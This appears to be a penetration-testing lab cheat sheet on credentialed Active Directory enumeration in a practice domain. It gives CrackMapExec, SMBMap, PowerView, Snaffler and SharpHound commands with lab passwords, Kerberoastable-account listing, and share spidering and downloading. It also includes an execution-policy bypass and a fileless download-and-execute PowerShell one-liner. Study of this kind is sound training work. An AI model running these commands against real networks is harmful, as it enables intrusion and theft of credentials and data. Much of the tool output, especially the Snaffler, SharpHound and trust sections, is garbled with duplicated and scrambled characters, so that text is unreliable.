Credentialed Enumeration
Credentialed Enumeration Linux
CrackMapExec (CME)
Domain User Enumeration
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --usersSMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain user(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\administrator badpwdcount: 0 baddpwdtime: 2022-03-29 12:29:14.476567
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0 baddpwdtime: 2022-04-09 23:04:58.611828
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0 baddpwdtime: 2022-03-30 16:27:41.960920
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395Domain Group Enumeration
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groupsSMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain group(s)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Administrators membercount: 3
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Users membercount: 4
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Guests membercount: 2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Print Operators membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Backup Operators membercount: 1
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Replicator membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Domain Admins membercount: 19
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Domain Users membercount: 0
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Contractors membercount: 138
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Accounting membercount: 15
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Engineering membercount: 19
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Executives membercount: 10
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Human Resources membercount: 36Logged-On Users
C:\mrci0x1> sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-usersSMB 172.16.5.130 445 ACADEMY-EA-FILE [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-FILE) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 (Pwn3d!)
SMB 172.16.5.130 445 ACADEMY-EA-FILE [+] Enumerated loggedon users
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\clusteragent logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\lab_adm logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\svc_qualys logon_server: ACADEMY-EA-DC01
SMB 172.16.5.130 445 ACADEMY-EA-FILE INLANEFREIGHT\wley logon_server: ACADEMY-EA-DC01Share Enumeration
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --sharesSMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated shares
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Share Permissions Remark
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ----- ----------- ------
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ADMIN$ Remote Admin
SMB 172.16.5.5 445 ACADEMY-EA-DC01 C$ Default share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 Department Shares READ
SMB 172.16.5.5 445 ACADEMY-EA-DC01 IPC$ READ Remote IPC
SMB 172.16.5.5 445 ACADEMY-EA-DC01 NETLOGON READ Logon server share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 SYSVOL READ Logon server share
SMB 172.16.5.5 445 ACADEMY-EA-DC01 User Shares READ
SMB 172.16.5.5 445 ACADEMY-EA-DC01 ZZZ_archive READSpidering Shares
C:\mrci0x1> sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares'SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] Started spidering plus with option:
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] DIR: ['print$']
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] SIZE: 51200
SPIDER_P... 172.16.5.5 445 ACADEMY-EA-DC01 [*] OUTPUT: /tmp/cme_spider_plusC:\mrci0x1> head -n 10 /tmp/cme_spider_plus/172.16.5.5.json{
"Department Shares": {
"Accounting/Private/AddSelect.bat": {
"atime_epoch": "2022-03-31 14:44:42",
"ctime_epoch": "2022-03-31 14:44:39",
"mtime_epoch": "2022-03-31 15:14:46",
"size": "278 Bytes"
},
"Accounting/Private/ApproveConnect.wmf": {
"atime_epoch": "2022-03-31 14:45:14"
}
}
}SMBMap
Share Enumeration
C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5[+] IP: 172.16.5.5:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
User Shares READ ONLY
ZZZ_archive READ ONLYRecursive Directory Listing
C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only[+] IP: 172.16.5.5:445 Name: inlanefreight.local
Disk Permissions Comment
---- ----------- -------
Department Shares READ ONLY
.\Department Shares\*
dr--r--r-- 0 Thu Mar 31 15:34:29 2022 .
dr--r--r-- 0 Thu Mar 31 15:34:29 2022 ..
dr--r--r-- 0 Thu Mar 31 15:14:48 2022 Accounting
dr--r--r-- 0 Thu Mar 31 15:14:39 2022 Executives
dr--r--r-- 0 Thu Mar 31 15:14:57 2022 Finance
dr--r--r-- 0 Thu Mar 31 15:15:04 2022 HR
dr--r--r-- 0 Thu Mar 31 15:15:21 2022 IT
dr--r--r-- 0 Thu Mar 31 15:15:14 2022 Marketing
dr--r--r-- 0 Thu Mar 31 15:15:30 2022 SalesDownloading File from Share
C:\mrci0x1> smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' -r 'Accounting/Private/AddSelect.bat' -A[+] Downloading AddSelect.bat
[+] File saved to: ./AddSelect.batCrackMapExec Credentials Validation
C:\mrci0x1> crackmapexec smb 172.16.5.5 -u administrator -p "P@ssw0rd123"SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] ACADEMY-EA-DC01\administrator:P@ssw0rd123
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)Credentialed Enumeration - from Windows
ActiveDirectory PowerShell Module
Check Available Modules
PS C:\mrci0x1> Get-ModuleModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 2.0.0 PSReadline {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...Import Module
PS C:\mrci0x1> Import-Module ActiveDirectory
PS C:\mrci0x1> Get-ModulModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.1.0 ActiveDirectory {Add-ADCentralAccessPolicyMember, Add-ADComputerServiceAcc...
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 2.0.0 PSReadline {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...Domain Information
PS C:\mrci0x1> Get-ADDomainAllowedDNSSuffixes : {}
ChildDomains : {LOGISTICS.INLANEFREIGHT.LOCAL}
ComputersContainer : CN=Computers,DC=INLANEFREIGHT,DC=LOCAL
DeletedObjectsContainer : CN=Deleted Objects,DC=INLANEFREIGHT,DC=LOCAL
DistinguishedName : DC=INLANEFREIGHT,DC=LOCAL
DNSRoot : INLANEFREIGHT.LOCAL
DomainControllersContainer : OU=Domain Controllers,DC=INLANEFREIGHT,DC=LOCAL
DomainMode : Windows2016Domain
DomainSID : S-1-5-21-3842939050-3880317879-2865463114
ForeignSecurityPrincipalsContainer : CN=ForeignSecurityPrincipals,DC=INLANEFREIGHT,DC=LOCAL
Forest : INLANEFREIGHT.LOCAL
InfrastructureMaster : ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
LastLogonReplicationInterval :
LinkedGroupPolicyObjects : {cn={DDBB8574-E94E-4525-8C9D-ABABE31223D0},cn=policies,cn=system,DC=INLANEFREIGHT,
DC=LOCAL, CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=INLAUser Enumeration (Kerberoastable Accounts)
PS C:\mrci0x1> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNameDistinguishedName : CN=adfs,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
Enabled : True
GivenName : Sharepoint
Name : adfs
ObjectClass : user
ObjectGUID : 49b53bea-4bc4-4a68-b694-b806d9809e95
SamAccountName : adfs
ServicePrincipalName : {adfsconnect/azure01.inlanefreight.local}
SID : S-1-5-21-3842939050-3880317879-2865463114-5244
Surname : Admin
UserPrincipalName :
DistinguishedName : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
Enabled : True
GivenName : Jessica
Name : BACKUPAGENT
ObjectClass : user
ObjectGUID : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName : backupagent
ServicePrincipalName : {backupjob/veam001.inlanefreight.local}
SID : S-1-5-21-3842939050-3880317879-2865463114-5220
Surname : Systemmailbox 8Cc370d3-822A-4Ab8-A926-Bb94bd0641a9Trust Relationships
PS C:\mrci0x1> Get-ADTrust -Filter *Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=LOGISTICS.INLANEFREIGHT.LOCAL,CN=System,DC=INLANEFREIGHT,DC=LOCAL
ForestTransitive : False
IntraForest : True
IsTreeParent : False
IsTreeRoot : False
Name : LOGISTICS.INLANEFREIGHT.LOCAL
ObjectClass : trustedDomain
ObjectGUID : f48a1169-2e58-42c1-ba32-a6ccb10057ec
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=INLANEFREIGHT,DC=LOCAL
Target : LOGISTICS.INLANEFREIGHT.LOCAL
TGTDelegation : False
TrustAttributes : 32
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : FalseGroup Enumeration
PS C:\mrci0x1> Get-ADGroup -Filter * | select namename
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM AccessDetailed Group Info
PS C:\mrci0x1> Get-ADGroup -Identity "Backup Operators"DistinguishedName : CN=Backup Operators,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
GroupCategory : Security
GroupScope : DomainLocal
Name : Backup Operators
ObjectClass : group
ObjectGUID : 6276d85d-9c39-4b7c-8449-cad37a8abc38
SamAccountName : Backup Operators
SID : S-1-5-32-551Group Membership
PS C:\mrci0x1> Get-ADGroupMember -Identity "Backup Operators"distinguishedName : CN=BACKUPAGENT,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
name : BACKUPAGENT
objectClass : user
objectGUID : 2ec53e98-3a64-4706-be23-1d824ff61bed
SamAccountName : backupagent
SID : S-1-5-21-3842939050-3880317879-2865463114PowerView
User Information
PS C:\mrci0x1> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrolname : Matthew Morgan
samaccountname : mmorgan
description :
memberof : {CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Shared Calendar
Read,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=Printer Access,OU=Security
Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=File Share H Drive,OU=Security
Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL...}
whencreated : 10/27/2021 5:37:06 PM
pwdlastset : 11/18/2021 10:02:57 AM
lastlogontimestamp : 2/27/2022 6:34:25 PM
accountexpires : NEVER
admincount : 1
userprincipalname : mmorgan@inlanefreight.local
serviceprincipalname :
mail :
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, DONT_REQ_PREAUTHGroup Membership
PS C:\mrci0x1> Get-DomainGroupMember -Identity "Domain Admins" -RecurseGroupDomain : INLANEFREIGHT.LOCAL
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : svc_qualys
MemberDistinguishedName : CN=svc_qualys,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3842939050-3880317879-2865463114-5613
GroupDomain : INLANEFREIGHT.LOCAL
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain : INLANEFREIGHT.LOCAL
MemberName : sp-admin
MemberDistinguishedName : CN=Sharepoint Admin,OU=Service Accounts,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass : user
MemberSID : S-1-5-21-3842939050-3880317879-2865463114-5228
Trust Enumeration
PS C:\mrci0x1> Get-DomainTrustMappingSourceName : INLANEFREIGHTLOGN.LOCAL
TargetName : WINDOWS_ACTIVE_LOGISTICS.INLANEFREIGHT.REIGHTLOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/1/2021 6:20:22 PM
WhenChanged : 2/26/2022 11:55:55 PM
SourceName : INLANEFREIGHT.STLOCAL
TargetName : LOGISTICSFREIGHT.LOCAL
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
### Membership MembershipsLocal Admin Access
PS C:\mrci0x1> Test-AdminAccess -ComputerName ACADEMY-EA-MS01ComputerName IsAdmin
------------ -------
ACADEMY-EA-MS01 True Kerberoastable Accounts
PS C:\mrci0x1> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalNameserviceprincipalname samaccountname
-------------------- adfs---------
adfsconnect/azure01.inlanefreight.local : adfs
backupjob/veam001.inlanefreight.local : backupagent
d0wngrade/kerberoast.inlanefreight.local : d0wngrade
kadmin/changepw : krbtgt
MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433 : sqldev
MSSQLSvc/SPSJDB.inlanefreight.local:1433 : sqlprod
MSSQLSvc/SQL-CL01-01inlanefreight.local:49351 : sqlqa
sts/inlanefreight.local : solarwindsmonitor
testspn/kerberoast.inlanefreight.local : testspn
testspn2/kerberoast.inlanefreight.local : testspn2SharpView
User Enumeration
PS C:\mrci0x1> .\SharpView.exe Get-DomainUser -Identity forend[Get-DomainSearcher] search base: LDAP://ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
[Get-DomainUser] filter string: (&(samAccountType=805306368)(|(samAccountName=forend)))
objectsid : {S-1-5-21-3842939050-29-2865463114-5614}
samaccounttype : USER_OBJECT
objectguid : 53264142-47ab
useraccountcontrol : OBJECT_4
accountexpires : 12/31/1600 4:00:00 PM
lastlogon : 4/18/2022 1:01:21 PM
lastlogontimestamp : 4/9/2022 1:33:21 PM
pwdlastset : 2/28/2022 12:31:45 PM
lastlogoff : 12/31/1600 4:00:00
badpasswordtime : 4/5/2022 7:09:07 AM
name : forend user
distinguishedname : AN:forend,OU=CNC=IT,OU=HQ-NYC,
: OU=Employees,OU,DC=INLANEFREIGHT,DC=LOCAL
whencreated : 2/28/2022 8:03:45 PM
whenchanged : 4/9/2022 8:33:21 PM
samaccountname : forend
memberof : {CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL,DC=Users, CN=SShared Calendar,OU=Security,DC=Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=PPurchase Access,OU=Security,DC=Users
DC=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=File,OU=SSecurity Share Drive,
OU,DC=Users,DC=Corp,DC=INLANEFREIGHT,DC=LOCAL, CN=FFile Share Drive,
OU=SecGroup,OU=Corp,DC=INDC,DC=LANEFREIGHT,DC=LOCAL}
cn : {forend}Snaffler
Execution Command
PS C:\mrci0x1> .\Snaffler.exe -d INLANEFREIGHT -s -v data .::::::.:::::.. ::::. ::::. .-:::::'.-:::::'::::::: .,::::::: :::::::..:.
;;;::::: ``;;;::::: , `;;;:::;; ;;;:'''' ;;;:'''' ;;;; ;;;:::::'''' ;;;:::;;;:::;;;;
'[==/[[[@, [[[[[. '[[@ .[[@ '[[@, [[[@@==, [[[@@== [[[@@@ [[c@ccc [[[,/c[[['@'
''' $ @@@ 'Y$c@@c@@@cc@@@c`@@$'`` `@@$'`` @@' @@"" $$$$@@c
88b dP@ @@@ Y@@ 888 @@@,888 @@@ o88oo,.__@@@oo,__ 888b@@@b'88bo,
'YMmMY' :MMM YM YMM :@@ '@@, '@@@, ''''YUMMMYUM@@'@@MMMM@ 'MMM'
by l0ss and Sh@r@ - - - github.com/SnaffCon/Snaffler
2022-03-31 12:16:54 -07:00 [Share]] {D}:(\\(\\(\\ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL\ADMIN$:($)
2022-03-31-12 12:16:54 -07:00:00 [SShare] {AddD}:(\\(\\ACADEMY-EA-MS01.INLANEFREIGHT.MS01LOCAL\CC$:($)
2022-03-12:16:54 -073-31 12:00 [Share]: {Add}(\\(\\ACDEMY-EA-MXMY.INLANEFMY.LOCALTY\01:address)
2022-03-12-31 16:54 -07:16:00 [Share]: {Add}(\\A(\CADEMY-EA-DC01.INLANEFREIGHT.LOCAL\TDepartment SShares)
2022-03-12-31-16:54-07:16:00:00 [SShare] {Add}: (\\(\ACADEMY-EA-DC01.INLANEFREIGHT.FREIGHTLOCAL\Users S\Share)
2022-03-12-12 31-16-17:54-07:00:00: [SShare] {Add}: (\\(\ACADEMY-EAEA-DC01.INLANEFREIGHT.FREIGHT.LOCAL\ZZZ_archiveZ))
2022-03-31-12:17:18-07-31 17:00-12: [Share]] :{C15}(\\AC(\ADEMY-EA-CAC01.INLANEFACIGHT.YEALOCAL\CertTEnroll)
2022-03-12-31:17:19-07-17:00:00 [FFile] {DBlack}<KEEP BLACK_EXACT|RX|A\.kAdb$|289B|3/3B|3/31/2022 122:09:22 PM>(\\AC(\ADEMY-EA-DC01.DE.INLANEFREIGHT.LOCALTY\Department Shares\S\IT\InfosecInf\GroupBackup.kdb) .kAdb
2022-03-12-31:17-32:19-07:00:00: [File] {R[DAdd}|>R|^\<.s\.key$|k299B|3/31/2022 122:05:33/31/ PM>(\\A(\CADEMY-EA-DC01.TADEINLANEFREIGHT.LOCALLO\TDepartment Shares\IT\S\InfosecInf\owShareReset.key) .ks
ey
2022-03-12-31:17:19-32-07:17:00:00 [SShare] :{AddG}(\\A(\CADEMY-EA-FILE.INLANEFREIGHT.FREIGHT.LOCALTY.YEAL\UpdateServicesPackagesPackage)
2022-03-12:17:31-32-07:00:00 [FFile] {DBlack<KB}|RACK|\<.^\.kwallet$|kwalletD|302B|3/2B|31/2022 122:04:32 PM/ 3/31>(\\(A\CADEMY-EA-DC01.DE.INLANEFREIGHT.FREIGHTLOCAL\TY\DepartmentShare S\Shares\IT\InfosecI\T\WriteUse.kdwallet) .kwallet
2022-03-12:17:31-32-07:00:00:00 [FFile] {R[DAdd}|R>|^\<.s\.k\.ey$|k$|298B|3B|31/298 2022/ 122:05:31 PM/ 3/00>(\\(A(\CADEMY-EA-D.\C01.INLANEFREIGHT.FREIGHT.LOCALTY\Y\Department S\Shares\IT\InfosecI\ProtectStep.tkey) .ks
2022-03-12:31:17-32-07:00:00: [FFile] {DBlackK}|<KBLACK_EXACT_B|RX|\.p\.ppk$|p$|D|275B|3/2B|31/2022 17:04:40: PM3/ 3/31>(\\(A\CADEMY\(-EA-DAC01.DE.INLANEFREIGHT.FREIGHT.LOCALTY\Department S\Shares\IT\S\InfosecInf\StopTrace.Tp) .ppk
2022-03-12:31:17-32-07:00:00:00 [FFile] {R[DAdd}|:R>|^<\.s\.k\.ey$|k$|ey|301B|3B|31/2022 122:09:31:17: PM3/ 3/3> (\\A(\CADEMY-EA|\-D.DE.INLANEC01.FREIGHT.LOCALTYME\Y\Department S\Share\IT\Shares\I\TInfosec I\WaitClear.nfkey) .ksy
2022-12-31:17-32-07:00:00: [FFile] {R[DAdd}|:R> R|^<\.s\k\.sqld\.ump$|d$|$|312B|3/2B|31/2022 122:05:31:30 PM |/31> (\\A(\CADEMY-EA|\-D.DE.INLANEFREIGHT.DAC01.LOCALTY\ME\Department S\Share\IT\S\Developmenthares\DenyRedo.TSsqldump) .sql
2022-12-31:17-32-07:00:00:00 [F] {R[DAdd}|R>R|^R|^<\.s\.s\.qldump$|d$||$|310B|3B|/31/2022| 122:05:31:02/ PM3/ |31> (\A\\(A\CADEMY-EA|-D.DE.INLANEFREIGHT.DC01|.LOCALTY\ME\Y\Department| S\Share\IT\Development\S\AddPublish.tssqldump)
2022-12-31:17-32-07:00:00 [SShare] [:{AddG}]({\\(A\CADEMY-EA-FILE.INLANEFREIGHT.FREIGHT|.YLOCAL\WsusContentC\ontenters)
})
2022-12-31:12:17-32-07:00:00: [FFile] {R[DAdd}|:R>R|^<\.^|^s\.mdf$|f|$|297B|$|3/31/2022| 12:09:31:14/ PMBloodHound (SharpHound)
Data Collection
PS C:\> .\SharpHound.exe -c All --zipfilename ILFREIGHT2022-04-18T13:58:22.1163680-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Group, LocalGroup, OU, Session, LoggedOn, Groups, Trusts, Container, Group, ACLs, RDP, Object, DCOM, Group, SPNs, Targets, PSRemote
2022-04-17:58:22.1163680-07-17:00:00|IINFORMATIONN|Initializing| Sharp|Zound at 1:17 PM |on 4/17/2022
2022-04-17-17:58:22.678901-07-00:00|IINFORMATION|N|Flags:: FormationForm, LocalAdmin, GLocalGroup, Form, Sessions, LoggedOn, STrusts, Group, Containers, ACL, T, RDGroup, ObjectP, DCOMs, Group, SPN, NS, Target, SPS, PSRem
2022-04-17:58-23:085901.1206-07:00:00
|INFORMATION|N|Beginning: LDAPAP Search for IADLANEFREIGHT.LOLOCAL
2022-04-17:58:53-07.91301-00:00 [|SINFORMATIONT|:0|Status|:0 objects| (+0 0)/s |--| Using| (67 MB R)AM
2022-04-17:59:15-08.788291-07:00:00|IINFORMATION|N|Producer: Has finished|, |closing, LDAPAP channel|
2022-04-17:59:16-17.178901-07:00:00|IINFORMATION|N|LDAPAP channel| closed,:| waiting| forW consumers|
2022-04-17:59:23-08.928901-08:00:00|IINFORMATION|N|S:T|: 37793 |objects (+3793 63.31667)/s |--|-- Using| 112 MB R|AM
2022-04-17:59:45-09.4132861-07:00:00|IINFORMATION|N|C:onsumer| finished|, |closing| output| channelC|
Closing| writers|
2022-04-17:59:45-09.4601086-07:00:00|IINFORMATION|N|Output|: channel| closed|,| waiting| forW output| task| toT complete|
2022-04-17:59:45-09.8663528-07:00:00|IINFORMATION|N|S:T|: 38079 |objects| finished| (+16 46.451)|/s |--|-- Using-| 110 MB R|AM
2022-04-17:59:45-09.8663528-07:00:00|IINFORMATION|N|E:numeration| finished| in 00:01:17.7919186
2022-04-17:59:46-09.3663660-07:00:00|IINFORMATION|N|Sharp|ZHound| Enumeration|: CCompleted!| at 1:17 PM |on 4/17/2022!| Happy| GraphingGLaunch GUI
PS C:\mrci0x1> bloodhound
Living Off the Land
Basic Host Information Commands
Command
Command Itself
Small Description
Hostname
hostname
Show machine name.
OS Version
[System.Environment]::OSVersion.Version
Display OS version and revision (PowerShell).
Installed Patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
List installed patches and hotfixes.
Network Config
ipconfig /all
Show full network adapter configurations.
Environment Variables (CMD)
set
List environment variables (from CMD).
Domain Name
echo %USERDOMAIN%
Show domain name (CMD).
Logon Server
echo %logonserver%
Show domain controller used for logon (CMD).
System Info
systeminfo
Full host summary (OS, HW, domain, patches, etc.).
PowerShell Recon & Execution
Command
Command Itself
Small Description
List Modules
Get-Module
List available PowerShell modules.
Execution Policy
Get-ExecutionPolicy -List
Show execution policy for each scope.
Bypass Execution Policy
Set-ExecutionPolicy Bypass -Scope Process
Temporarily bypass execution policy for current session.
Environment Variables (PowerShell)
`Get-ChildItem Env:
Format-Table Key,Value`
PowerShell History
Get-Content $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Show user’s PowerShell command history (may leak credentials/scripts).
Fileless Execution
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'); <commands>"
Download & execute remote script in memory (fileless execution).
Firewall Configuration
PS C:\mrci0x1> netsh advfirewall show allprofilesDomain Profile Settings:
----------------------------------------------------------------------
State OFF
Firewall Policy BlockInbound,AllowOutbound
LocalFirewallRules N/A (GPO-store only)
LocalConSecRules N/A (GPO-store only)
InboundUserNotification Disable
RemoteManagement Disable
UnicastResponseToMulticast Enable
Logging:
LogAllowedConnections Disable
LogDroppedConnections Disable
FileName %systemroot%\system32\LogFiles\Firewall\pfirewall.log
MaxFileSize 4096Windows Defender Status
C:\mrci0x1> sc query windefendSERVICE_NAME: windefend
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0PS C:\mrci0x1> Get-MpComputerStatusAMEngineVersion : 1.1.19000.8
AMProductVersion : 4.18.2202.4
AMRunningMode : Normal
AMServiceEnabled : True
AMServiceVersion : 4.18.2202.4
AntispywareEnabled : True
AntispywareSignatureAge : 0
AntispywareSignatureLastUpdated : 3/21/2022 4:06:15 AM
AntispywareSignatureVersion : 1.361.414.0
AntivirusEnabled : True
AntivirusSignatureAge : 0
AntivirusSignatureLastUpdated : 3/21/2022 4:06:16 AM
AntivirusSignatureVersion : 1.361.414.0
BehaviorMonitorEnabled : True
ComputerID : FDA97E38-1666-4534-98D4-943A9A871482
ComputerState : 0
DefenderSignaturesOutOfDate : False
DeviceControlDefaultEnforcement : Unknown
DeviceControlPoliciesLastUpdated : 3/20/2022 9:08:34 PM
DeviceControlState : Disable
FullScanStartTime :
IoavProtectionEnabled : True
IsTamperProtected : True
IsVirtualMachine : False
LastFullScanSource : 0
LastQuickScanSource : 2Checking Logged-in Users
PS C:\mrci0x1> qwinsta SESSIONNAME USERNAME ID STATE TYPE DEVICE
services 0 Disc
>console forend 1 Active
rdp-tcp 65536 ListenNetwork Enumeration
Command
Command Itself
Small Description
ARP Table
arp -a
List discovered devices in ARP cache (local LAN devices).
Network Config
ipconfig /all
Show full network adapter settings (IP, DNS, gateway).
Routing Table
route print
Show network routes (what networks are reachable).
Firewall Info
netsh advfirewall show allprofiles
Display firewall status and active firewall rules.
WMIC System Enumeration
Command
Command Itself
Small Description
